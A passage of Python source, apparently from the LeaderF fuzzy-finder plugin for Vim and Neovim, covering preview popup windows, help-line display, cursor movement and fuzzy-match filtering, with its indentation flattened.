if maxheight < 1:
return
if buffer_len >= maxheight: # scrollbar appear
maxwidth -= 1
pos = "botleft"
line = maxheight + 1
else: # cursor
lfCmd("""call win_execute(%d, "let numberwidth = &numberwidth")""" % popup_window.id)
col = int(popup_pos["core_col"]) + int(lfEval("numberwidth")) + popup_window.cursor[1]
lfCmd("""call win_execute(%d, "let delta_height = line('.') - line('w0')")""" % popup_window.id)
# the line of buffer starts from 0, while the line of line() starts from 1
start = int(lfEval("line('w0', %d)" % popup_window.id)) - 1
end = int(lfEval("line('.', %d)" % popup_window.id)) - 1
col_width = int(popup_pos["core_width"]) - int(lfEval("numberwidth"))
delta_height = lfActualLineCount(self._getInstance().buffer, start, end, col_width)
# int(popup_pos["core_line"]) - 1(exclude the first line) - 1(input window)
maxheight = int(popup_pos["core_line"]) + delta_height - 2
pos = "botleft"
line = maxheight + 1
options = {
"title": title,
"maxwidth": maxwidth,
"minwidth": maxwidth,
"maxheight": maxheight,
"minheight": maxheight,
"zindex": 20481,
"pos": pos,
"line": line,
"col": col,
"padding": [0, 0, 0, 0],
"border": [1, 0, 0, 0],
"borderchars": [' '],
"borderhighlight": ["Lf_hl_previewTitle"],
"filter": "leaderf#popupModePreviewFilter",
}
if preview_pos.lower() == 'bottom':
del options["title"]
options["border"] = [0, 0, 1, 0]
elif preview_pos.lower() == 'cursor' and maxheight < int(lfEval("&lines"))//2 - 2:
maxheight = int(lfEval("&lines")) - maxheight - 5
del options["title"]
options["border"] = [0, 0, 1, 0]
options["maxheight"] = maxheight
options["minheight"] = maxheight
if isinstance(source, int):
lfCmd("noautocmd silent! let winid = popup_create(%d, %s)" % (source, json.dumps(options)))
else:
lfCmd("silent! let winid = popup_create(content, %s)" % json.dumps(options))
lfCmd("call win_execute(winid, 'doautocmd filetypedetect BufNewFile %s')" % escQuote(source))
self._preview_winid = int(lfEval("winid"))
if jump_cmd:
lfCmd("""call win_execute(%d, '%s')""" % (self._preview_winid, escQuote(jump_cmd)))
elif line_nr > 0:
lfCmd("""call win_execute(%d, "call cursor(%d, 1)")""" % (self._preview_winid, line_nr))
lfCmd("call win_execute(%d, 'setlocal cursorline number norelativenumber colorcolumn= ')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal foldmethod=manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call win_execute(%d, 'setlocal cursorlineopt=both')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal wincolor=Lf_hl_popup_window')" % self._preview_winid)
if lfEval("get(g:, 'Lf_PopupShowFoldcolumn', 1)") == '0':
lfCmd("call win_execute(%d, 'setlocal foldcolumn=0')" % self._preview_winid)
else:
lfCmd("call win_execute(%d, 'setlocal foldcolumn=1')" % self._preview_winid)
lfCmd("call win_execute(%d, 'norm! zz')" % self._preview_winid)
@ignoreEvent('BufRead,BufReadPre,BufReadPost')
def _createPopupPreview(self, title, source, line_nr, jump_cmd=''):
"""
Args:
source:
if the type is int, it is a buffer number
if the type is str, it is a file name
"""
self._is_previewed = True
line_nr = int(line_nr)
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._createPopupModePreview(title, source, line_nr, jump_cmd)
return
if lfEval("has('nvim')") == '1':
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
width = int(lfEval("&columns"))//2
else:
width = min(width, int(lfEval("&columns")))
maxheight = int(lfEval("&lines - (line('w$') - line('.')) - 3"))
maxheight -= int(self._getInstance().window.height) - int(lfEval("(line('w$') - line('w0') + 1)"))
relative = 'editor'
anchor = "SW"
row = maxheight
if isinstance(source, int):
buffer_len = len(vim.buffers[source])
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
buffer_len = int(lfEval("len(content)"))
lfCmd("let scratch_buffer = nvim_create_buf(0, 1)")
lfCmd("call setbufline(scratch_buffer, 1, content)")
lfCmd("call nvim_buf_set_option(scratch_buffer, 'bufhidden', 'wipe')")
height = min(maxheight, buffer_len)
preview_pos = lfEval("get(g:, 'Lf_PreviewHorizontalPosition', 'right')")
if preview_pos.lower() == 'center':
col = (int(lfEval("&columns")) - width) // 2
elif preview_pos.lower() == 'left':
col = 0
elif preview_pos.lower() == 'right':
col = int(lfEval("&columns")) - width
else:
relative = 'cursor'
row = 0
col = 0
if maxheight < int(lfEval("&lines"))//2 - 2:
anchor = "NW"
if relative == 'cursor':
row = 1
else:
row = maxheight + 1
height = min(int(lfEval("&lines")) - maxheight - 3, buffer_len)
config = {
"relative": relative,
"anchor" : anchor,
"height" : height,
"width" : width,
"row" : row,
"col" : col
}
if isinstance(source, int):
self._preview_winid = int(lfEval("nvim_open_win(%d, 0, %s)" % (source, str(config))))
else:
self._preview_winid = int(lfEval("nvim_open_win(scratch_buffer, 0, %s)" % str(config)))
if jump_cmd:
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd(jump_cmd)
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
if buffer_len >= line_nr > 0:
lfCmd("""call nvim_win_set_cursor(%d, [%d, 1])""" % (self._preview_winid, line_nr))
lfCmd("call nvim_win_set_option(%d, 'number', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'relativenumber', v:false)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'foldmethod', 'manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call nvim_win_set_option(%d, 'cursorlineopt', 'both')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'colorcolumn', '')" % self._preview_winid)
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
if not isinstance(source, int):
lfCmd("doautocmd filetypedetect BufNewFile %s" % source)
lfCmd("silent! %foldopen!")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
preview_pos = lfEval("get(g:, 'Lf_PreviewHorizontalPosition', 'right')")
if preview_pos.lower() == 'center':
col = 0
elif preview_pos.lower() == 'left':
col = 1
elif preview_pos.lower() == 'right':
col = int(lfEval("&columns"))//2 + 2
else:
col = "cursor"
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2 - 1
else:
maxwidth = min(width, int(lfEval("&columns")))
maxheight = int(lfEval("&lines - (line('w$') - line('.')) - 4"))
maxheight -= int(self._getInstance().window.height) - int(lfEval("(line('w$') - line('w0') + 1)"))
options = {
"title": title,
"maxwidth": maxwidth,
"minwidth": maxwidth,
"maxheight": maxheight,
"minheight": maxheight,
"zindex": 20481,
"pos": "botleft",
"line": "cursor-1",
"col": col,
"padding": [0, 0, 0, 1],
"border": [1, 0, 0, 0],
"borderchars": [' '],
"borderhighlight": ["Lf_hl_previewTitle"],
"filter": "leaderf#popupModePreviewFilter",
}
if maxheight < int(lfEval("&lines"))//2 - 2:
maxheight = int(lfEval("&lines")) - maxheight - 5
del options["title"]
options["border"] = [0, 0, 1, 0]
options["maxheight"] = maxheight
options["minheight"] = maxheight
if isinstance(source, int):
lfCmd("noautocmd silent! let winid = popup_create(%d, %s)" % (source, json.dumps(options)))
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
lfCmd("silent! let winid = popup_create(content, %s)" % json.dumps(options))
lfCmd("call win_execute(winid, 'doautocmd filetypedetect BufNewFile %s')" % escQuote(source))
self._preview_winid = int(lfEval("winid"))
if self._current_mode == 'NORMAL':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#normalModePreviewFilter', [%d]))"
% (self._preview_winid, id(self)))
if jump_cmd:
lfCmd("""call win_execute(%d, '%s')""" % (self._preview_winid, escQuote(jump_cmd)))
elif line_nr > 0:
lfCmd("""call win_execute(%d, "exec 'norm! %dG'")""" % (self._preview_winid, line_nr))
lfCmd("call win_execute(%d, 'setlocal cursorline number norelativenumber')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal foldmethod=manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call win_execute(%d, 'setlocal cursorlineopt=both')" % self._preview_winid)
def _needPreview(self, preview):
"""
Args:
preview:
if True, always preview the result no matter what `g:Lf_PreviewResult` is.
"""
preview_dict = {k.lower(): v for k, v in lfEval("g:Lf_PreviewResult").items()}
category = self._getExplorer().getStlCategory()
if not preview and int(preview_dict.get(category.lower(), 0)) == 0:
return False
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
self._orig_line = self._getInstance().currentLine
return False
elif self._getInstance().window.cursor[0] <= self._help_length:
self._orig_line = self._getInstance().currentLine
return False
if self._getInstance().empty() or (self._getInstance().getWinPos() != 'popup' and
vim.current.buffer != self._getInstance().buffer):
return False
if self._ctrlp_pressed == True:
return True
line = self._getInstance().currentLine
if self._orig_line == line and (self._getInstance().buffer.options['modifiable']
or self._getInstance().getWinPos() in ('popup', 'floatwin')):
return False
self._orig_line = self._getInstance().currentLine
return True
def _getInstance(self):
if self._instance is None:
self._instance = LfInstance(self, self._getExplorer().getStlCategory(),
self._cli,
self._beforeEnter,
self._afterEnter,
self._beforeExit,
self._afterExit)
return self._instance
def _createHelpHint(self):
help = []
if not self._show_help:
if lfEval("get(g:, 'Lf_HideHelp', 0)") == '0':
help.append('" Press <F1> for help')
help.append('" ---------------------------------------------------------')
else:
help += self._createHelp()
self._help_length = len(help)
orig_row = self._getInstance().window.cursor[0]
if self._getInstance().isReverseOrder():
self._getInstance().buffer.options['modifiable'] = True
self._getInstance().buffer.append(help[::-1])
self._getInstance().buffer.options['modifiable'] = False
buffer_len = len(self._getInstance().buffer)
if buffer_len < self._initial_count:
if "--nowrap" not in self._arguments:
self._getInstance().window.height = min(self._initial_count,
self._getInstance()._actualLength(self._getInstance().buffer))
else:
self._getInstance().window.height = buffer_len
elif self._getInstance().window.height < self._initial_count:
self._getInstance().window.height = self._initial_count
lfCmd("normal! Gzb")
self._getInstance().window.cursor = (orig_row, 0)
else:
self._getInstance().buffer.options['modifiable'] = True
self._getInstance().buffer.append(help, 0)
self._getInstance().buffer.options['modifiable'] = False
self._getInstance().window.cursor = (orig_row + self._help_length, 0)
self._getInstance().mimicCursor()
self._getInstance().refreshPopupStatusline()
def _hideHelp(self):
self._getInstance().buffer.options['modifiable'] = True
if self._getInstance().isReverseOrder():
orig_row = self._getInstance().window.cursor[0]
countdown = len(self._getInstance().buffer) - orig_row - self._help_length
if self._help_length > 0:
del self._getInstance().buffer[-self._help_length:]
self._getInstance().buffer[:] = self._getInstance().buffer[-self._initial_count:]
lfCmd("normal! Gzb")
if 0 < countdown < self._initial_count:
self._getInstance().window.cursor = (len(self._getInstance().buffer) - countdown, 0)
else:
self._getInstance().window.cursor = (len(self._getInstance().buffer), 0)
self._getInstance().setLineNumber()
else:
del self._getInstance().buffer[:self._help_length]
if self._help_length > 0 and self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! %dk')" % (self._getInstance().getPopupWinId(), self._help_length))
self._help_length = 0
self._getInstance().refreshPopupStatusline()
def _inHelpLines(self):
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
return True
elif self._getInstance().window.cursor[0] <= self._help_length:
return True
return False
def _getExplorer(self):
if self._explorer is None:
self._explorer = self._getExplClass()()
return self._explorer
def _resetAutochdir(self):
if int(lfEval("&autochdir")) == 1:
self._autochdir = 1
lfCmd("set noautochdir")
else:
self._autochdir = 0
def _setAutochdir(self):
if self._autochdir == 1:
# When autochdir is set, Vim will change the current working directory
# to the directory containing the file which was opened or selected.
lfCmd("set autochdir")
def _toUpInPopup(self):
if self._preview_winid > 0 and int(lfEval("winbufnr(%d)" % self._preview_winid)) != -1:
if lfEval("has('nvim')") == '1':
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd("norm! k")
lfCmd("redraw")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
lfCmd("call win_execute(%d, 'norm! k')" % (self._preview_winid))
def _toDownInPopup(self):
if self._preview_winid > 0 and int(lfEval("winbufnr(%d)" % self._preview_winid)) != -1:
if lfEval("has('nvim')") == '1':
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd("norm! j")
lfCmd("redraw")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
lfCmd("call win_execute(%d, 'norm! j')" % (self._preview_winid))
def _toUp(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! k')" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
adjust = False
if self._getInstance().isReverseOrder() and self._getInstance().getCurrentPos()[0] == 1:
adjust = True
self._setResultContent()
if self._cli.pattern and self._cli.isFuzzy \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
lfCmd("norm! k")
if adjust:
lfCmd("norm! zt")
self._getInstance().setLineNumber()
lfCmd("setlocal cursorline!") # these two help to redraw the statusline,
lfCmd("setlocal cursorline!") # also fix a weird bug of vim
def _toDown(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! j')" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if not self._getInstance().isReverseOrder() \
and self._getInstance().getCurrentPos()[0] == self._getInstance().window.height:
self._setResultContent()
lfCmd("norm! j")
self._getInstance().setLineNumber()
lfCmd("setlocal cursorline!") # these two help to redraw the statusline,
lfCmd("setlocal cursorline!") # also fix a weird bug of vim
def _pageUp(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, 'exec "norm! \<PageUp>"')""" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if self._getInstance().isReverseOrder():
self._setResultContent()
if self._cli.pattern and self._cli.isFuzzy \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
lfCmd('exec "norm! \<PageUp>"')
self._getInstance().setLineNumber()
def _pageDown(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, 'exec "norm! \<PageDown>"')""" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if not self._getInstance().isReverseOrder():
self._setResultContent()
lfCmd('exec "norm! \<PageDown>"')
self._getInstance().setLineNumber()
def _leftClick(self):
if self._getInstance().getWinPos() == 'popup':
if int(lfEval("has('patch-8.1.2266')")) == 1:
if self._getInstance().getPopupWinId() == int(lfEval("v:mouse_winid")):
lfCmd("""call win_execute(%d, "exec v:mouse_lnum")"""
% (self._getInstance().getPopupWinId()))
lfCmd("""call win_execute(%d, "exec 'norm!'.v:mouse_col.'|'")"""
% (self._getInstance().getPopupWinId()))
exit_loop = False
elif self._getInstance().window.number == int(lfEval("v:mouse_win")):
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
self._getInstance().setLineNumber()
self.clearSelections()
exit_loop = False
elif self._preview_winid == int(lfEval("v:mouse_winid")):
if lfEval("has('nvim')") == '1':
lfCmd("call win_gotoid(%d)" % self._preview_winid)
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
self._current_mode = 'NORMAL'
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
exit_loop = True
else:
self.quit()
exit_loop = True
return exit_loop
def _search(self, content, is_continue=False, step=0):
if not is_continue:
self.clearSelections()
self._clearHighlights()
self._clearHighlightsPos()
self._cli.highlightMatches()
if not self._cli.pattern: # e.g., when <BS> or <Del> is typed
if self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
else:
self._getInstance().setBuffer(content[:self._initial_count])
self._getInstance().setStlResultsCount(len(content), True)
self._result_content = []
self._previewResult(False)
return
if self._cli.isFuzzy:
self._fuzzySearch(content, is_continue, step)
else:
self._regexSearch(content, is_continue, step)
self._previewResult(False)
def _filter(self, step, filter_method, content, is_continue,
use_fuzzy_engine=False, return_index=False):
""" Construct a list from result of filter_method(content).
Args:
step: An integer to indicate the number of lines to filter one time.
filter_method: A function to apply `content` as parameter and
return an iterable.
content: The list to be filtered.
"""
unit = self._getUnit()
step = step // unit * unit
length = len(content)
if self._index == 0:
self._cb_content = []
self._result_content = []
self._index = min(step, length)
cur_content = content[:self._index]
else:
if not is_continue and self._result_content:
if self._cb_content:
self._cb_content += self._result_content
else:
self._cb_content = self._result_content
if len(self._cb_content) >= step:
cur_content = self._cb_content[:step]
self._cb_content = self._cb_content[step:]
else:
cur_content = self._cb_content
left = step - len(self._cb_content)
self._cb_content = []
if self._index < length:
end = min(self._index + left, length)
cur_content += content[self._index:end]
self._index = end
if self._cli.isAndMode:
result, highlight_methods = filter_method(cur_content)
if is_continue:
self._previous_result = (self._previous_result[0] + result[0],
self._previous_result[1] + result[1])
result = self._previous_result
else:
self._previous_result = result
return (result, highlight_methods)
elif use_fuzzy_engine:
if return_index:
mode = 0 if self._cli.isFullPath else 1
tmp_content = [self._getDigest(line, mode) for line in cur_content]
result = filter_method(source=tmp_content)
result = (result[0], [cur_content[i] for i in result[1]])
else:
result = filter_method(source=cur_content)
if is_continue:
result = fuzzyEngine.merge(self._previous_result, result)
self._previous_result = result
else:
result = list(filter_method(cur_content))
if is_continue:
self._previous_result += result
result = self._previous_result
else:
self._previous_result = result
return result
def _fuzzyFilter(self, is_full_path, get_weight, iterable):
"""
return a list, each item is a pair (weight, line)
"""
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
pairs = ((get_weight(getDigest(line)), line) for line in iterable)
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
return (p for p in pairs if p[0] > MIN_WEIGHT)
def _fuzzyFilterEx(self, is_full_path, get_weight, iterable):
"""
return a tuple, (weights, indices)
"""
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2
iterable = itertools.islice(iterable, 0, None, self._getUnit())
pairs = ((get_weight(getDigest(line)), i) for i, line in enumerate(iterable))
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
result = [p for p in pairs if p[0] > MIN_WEIGHT]
if len(result) == 0:
weights, indices = [], []
else:
weights, indices = zip(*result)
return (list(weights), list(indices))
def _refineFilter(self, first_get_weight, get_weight, iterable):
getDigest = self._getDigest
triples = ((first_get_weight(getDigest(line, 1)),
get_weight(getDigest(line, 2)), line)
for line in iterable)
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
return ((i[0] + i[1], i[2]) for i in triples if i[0] > MIN_WEIGHT and i[1] > MIN_WEIGHT)
def _andModeFilter(self, iterable):
encoding = lfEval("&encoding")
cur_content = iterable
weight_lists = []
highlight_methods = []
for p in self._cli.pattern:
use_fuzzy_engine = False
if self._fuzzy_engine and isAscii(p) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2
use_fuzzy_engine = True
pattern = fuzzyEngine.initPattern(p)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=False, sort_results=False, is_and_mode=True)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Rg", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=False, is_and_mode=True)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=not self._cli.isFullPath, sort_results=False, is_and_mode=True)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=not self._cli.isFullPath)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True, clear=False)
elif is_fuzzyMatch_C and isAscii(p):
pattern = fuzzyMatchC.initPattern(p)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
else:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, getWeight)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, clear=False)
else:
fuzzy_match = FuzzyMatch(p, encoding)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight2)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Rg", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight3)
else:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight)
highlight_method = partial(self._highlight,
self._cli.isFullPath,
fuzzy_match.getHighlights,
clear=False)
if use_fuzzy_engine:
mode = 0 if self._cli.isFullPath else 1
tmp_content = [self._getDigest(line, mode) for line in cur_content]
result = filter_method(source=tmp_content)
else:
result = filter_method(cur_content)
for i, wl in enumerate(weight_lists):
weight_lists[i] = [wl[j] for j in result[1]]
weight_lists.append(result[0])
if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2
unit = self._getUnit()
result_content = [cur_content[i*unit:i*unit + unit] for i in result[1]]
cur_content = list(itertools.chain.from_iterable(result_content))
else:
cur_content = [cur_content[i] for i in result[1]]
result_content = cur_content
highlight_methods.append(highlight_method)
weights = [sum(i) for i in zip(*weight_lists)]
return ((weights, result_content), highlight_methods)
def _fuzzySearch(self, content, is_continue, step):
encoding = lfEval("&encoding")
use_fuzzy_engine = False
use_fuzzy_match_c = False
do_sort = "--no-sort" not in self._arguments
if self._cli.isAndMode:
filter_method = self._andModeFilter
elif self._cli.isRefinement:
if self._cli.pattern[1] == '': # e.g. abc;
if self._fuzzy_engine and isAscii(self._cli.pattern[0]):
use_fuzzy_engine = True
return_index = True
pattern = fuzzyEngine.initPattern(self._cli.pattern[0])
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=True, sort_results=do_sort)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=True)
highlight_method = partial(self._highlight, True, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern[0]):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern[0])
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilter, False, getWeight)
highlight_method = partial(self._highlight, False, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern[0], encoding)
if "--no-sort" in self._arguments:
getWeight = fuzzy_match.getWeightNoSort
else:
getWeight = fuzzy_match.getWeight
getHighlights = fuzzy_match.getHighlights
filter_method = partial(self._fuzzyFilter, False, getWeight)
highlight_method = partial(self._highlight, False, getHighlights)
elif self._cli.pattern[0] == '': # e.g. ;abc
if self._fuzzy_engine and isAscii(self._cli.pattern[1]):
use_fuzzy_engine = True
return_index = True
pattern = fuzzyEngine.initPattern(self._cli.pattern[1])
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=False, sort_results=do_sort)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=False)
highlight_method = partial(self._highlight, True, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern[1]):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern[1])
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
filter_method = partial(self._fuzzyFilter, True, getWeight)
highlight_method = partial(self._highlight, True, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern[1], encoding)
if "--no-sort" in self._arguments:
getWeight = fuzzy_match.getWeightNoSort
else:
getWeight = fuzzy_match.getWeight
getHighlights = fuzzy_match.getHighlights
filter_method = partial(self._fuzzyFilter, True, getWeight)
highlight_method = partial(self._highlight, True, getHighlights)
else: # e.g. abc;def
if is_fuzzyMatch_C and isAscii(self._cli.pattern[0]):
is_ascii_0 = True
pattern_0 = fuzzyMatchC.initPattern(self._cli.pattern[0])
getWeight_0 = partial(fuzzyMatchC.getWeight, pattern=pattern_0, is_name_only=True)
getHighlights_0 = partial(fuzzyMatchC.getHighlights, pattern=pattern_0, is_name_only=True)
else:
is_ascii_0 = False
fuzzy_match_0 = FuzzyMatch(self._cli.pattern[0], encoding)
if "--no-sort" in self._arguments:
getWeight_0 = fuzzy_match_0.getWeightNoSort
else:
getWeight_0 = fuzzy_match_0.getWeight
getHighlights_0 = fuzzy_match_0.getHighlights
if is_fuzzyMatch_C and isAscii(self._cli.pattern[1]):
is_ascii_1 = True
pattern_1 = fuzzyMatchC.initPattern(self._cli.pattern[1])
getWeight_1 = partial(fuzzyMatchC.getWeight, pattern=pattern_1, is_name_only=False)
getHighlights_1 = partial(fuzzyMatchC.getHighlights, pattern=pattern_1, is_name_only=False)
else:
is_ascii_1 = False
fuzzy_match_1 = FuzzyMatch(self._cli.pattern[1], encoding)
if "--no-sort" in self._arguments:
getWeight_1 = fuzzy_match_1.getWeightNoSort
else:
getWeight_1 = fuzzy_match_1.getWeight
getHighlights_1 = fuzzy_match_1.getHighlights
use_fuzzy_match_c = is_ascii_0 and is_ascii_1
filter_method = partial(self._refineFilter, getWeight_0, getWeight_1)
highlight_method = partial(self._highlightRefine, getHighlights_0, getHighlights_1)
else:
if self._fuzzy_engine and isAscii(self._cli.pattern) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2
use_fuzzy_engine = True
pattern = fuzzyEngine.initPattern(self._cli.pattern)
if self._getExplorer().getStlCategory() == "File":
return_index = False
if self._cli.isFullPath:
filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=False, sort_results=do_sort)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_File,
param=fuzzyEngine.createParameter(1),
is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Rg":
return_index = False
if "--match-path" in self._arguments:
filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=do_sort)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Rg,
param=fuzzyEngine.createRgParameter(self._getExplorer().displayMulti(),
self._getExplorer().getContextSeparator(), self._has_column),
is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Tag":
return_index = False
mode = 0 if self._cli.isFullPath else 1
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Tag,
param=fuzzyEngine.createParameter(mode), is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Gtags":
return_index = False
result_format = 1
if self._getExplorer().getResultFormat() in [None, "ctags-mod"]:
result_format = 0
elif self._getExplorer().getResultFormat() == "ctags-x":
result_format = 2
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Gtags,
param=fuzzyEngine.createGtagsParameter(0, result_format, self._match_path),
is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Line":
return_index = False
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Line,
param=fuzzyEngine.createParameter(1), is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=do_sort)
else:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=not self._cli.isFullPath, sort_results=do_sort)
